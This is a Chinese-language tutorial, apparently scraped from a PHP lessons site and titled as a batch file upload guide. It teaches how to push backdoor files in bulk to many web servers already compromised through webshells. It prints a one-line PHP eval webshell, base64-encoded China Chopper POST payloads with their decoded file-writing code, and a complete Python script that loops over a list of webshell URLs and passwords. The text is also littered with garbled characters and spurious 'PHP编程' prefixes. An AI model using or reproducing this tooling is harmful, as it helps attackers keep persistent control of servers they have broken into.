《PHP应用:PHP实现批量上传单个文件》要点:
本文介绍了PHP应用:PHP实现批量上传单个文件,希望对您有用。如果有疑问,可以联系我们。
PHP编程很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用.这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文给年夜家介绍基于php如何实现这类需求.
PHP编程0×01 原理阐发
PHP编程首先,我们必需了解菜刀是如何通过一句话木马来实现web服务器的文件管理的.
PHP编程下面是最常见的php一句话木马:
PHP编程
<?php eval($_POST[1]); ?>
PHP编程当我们将一句话木马上传到web服务器上后,我们就可以直接在菜刀中输入上面的暗码(如上例中的1)连接到服务器上来管理文件.
PHP编程那么,此处的菜刀如何通过简单的一句话就可以实现对服务器的管理和控制呢?通过分析菜刀的原理,我们不难发现菜刀是利用了eval这个函数来执行通过POST办法传过来的命令语句.
PHP编程因此,如果我们想通过菜刀一句话木马来实现文件上传的话,只需要向远程服务里上包含一句话的url发送一个带文件写入命令的POST哀求即可,比如:
PHP编程POST:
PHP编程1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];
PHP编程上面代码包括2个部分:
PHP编程1. 一句话的暗码
PHP编程2. 发送给服务器端的php执行代码
PHP编程既然知道原理了,我们只需要发送如下的POST哀求即可完成利用一句话上传文件的功能:
PHP编程POST:
PHP编程1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9JF9QT1NUWyJ6MSJdOwokYz0kX1BPU1RbInoyIl07CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7&z1=L3Zhci93d3cvcm9vdC8xLnR4dA==&z2=aGVsbG8gd29ybGQh
PHP编程仔细分析一下这段POST数据包括以下几个部分:
PHP编程1. 首先是php一句话的暗码1
PHP编程2. 通过eval办法来执行base64解码后的z0,解码整理后显示如下:
PHP编程
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=base64_decode($_POST["z2"]);
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=1)
$buf.=substr($c,$i,1);
echo(@fwrite(fopen($f,"w"),$buf));
echo("|<-");
die();
PHP编程3. 在z0中继续调用base64解码后的z1和z2,解码后如下:
PHP编程
z1=/var/www/root/1.txt
z2=hello world!
PHP编程至此,我们可以很清楚的发现上面的POST哀求的作用实际上是将一个写有hello world!的名为1.txt的文件上传至服务器上/var/www/root/路径下.
PHP编程0×02 代码实现
PHP编程基于上面的原理阐发,我们可以利用下面的代码基于php一句话来实现文件批量上传:
PHP编程
#!/usr/bin/python
#coding=utf-8
import urllib
import urllib2
import sys
import base64
import re
def post(url, data):
req = urllib2.Request(url)
data = urllib.urlencode(data)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
response = opener.open(req, data)
return response.read()
def get_shell_path(posturl,passwd):
shell_path = ""
try:
data = {}
data[passwd] = '@eval(base64_decode($_POST[z0]));'
data['z0']='ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
shell_path = post(posturl, data).strip()
except Exception:
pass
return shell_path
def main():
print '\n+++++++++Batch Uploading Local File (Only for PHP webshell)++++++++++\n'
shellfile = sys.argv[1] # 存放webshell路径和暗码的文件
localfile = sys.argv[2] # 本地待上传的文件名
shell_file = open(shellfile,'rb')
local_content = str(open(localfile,'rb').read())
for eachline in shell_file:
posturl = eachline.split(',')[0].strip()
passwd = eachline.split(',')[1].strip()
try:
reg = ".*/([^/]*\.php?)"
match_shell_name = re.search(reg,eachline)
if match_shell_name:
shell_name=match_shell_name.group(1)
shell_path = get_shell_path(posturl,passwd).strip()
target_path = shell_path.split(shell_name)[0]+localfile
target_path_base64 = base64.b64encode(target_path)
target_file_url = eachline.split(shell_name)[0]+localfile
data = {}
data[passwd] = '@eval(base64_decode($_POST[z0]));'
data['z0']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7'
data['z1']=target_path_base64
data['z2']=base64.b64encode(local_content)
response = post(posturl, data)
if response:
print '[+] '+target_file_url+', upload succeed!'
else:
print '[-] '+target_file_url+', upload failed!'
else:
print '[-] '+posturl+', unsupported webshell!'
except Exception,e:
print '[-] '+posturl+', connection failed!'
shell_file.close()
if __name__ == '__main__':
main()
PHP编程webshell.txt的格式: [一句话webshell文件路径],[webshell连接暗码]如下:
PHP编程http://www.example1.com/1.php, 1
PHP编程http://www.example2.com/1.php, 1
PHP编程http://www.example3.com/1.php, 1
PHP编程保留上面脚本为batch_upload_file.py,执行命令python batch_upload_file.py webshell.txt 1.txt,效果显示如下:
PHP编程
PHP编程以上内容给年夜家介绍了PHP实现批量上传单个文件的相关知识,希望年夜家喜欢.
《PHP应用:PHP实现批量上传单个文件》是否对您有启发,欢迎查看更多与《PHP应用:PHP实现批量上传单个文件》相关教程,学精学透。维易PHP学院为您提供精彩教程。
转载请注明本页网址:
http://www.vephp.com/jiaocheng/7964.html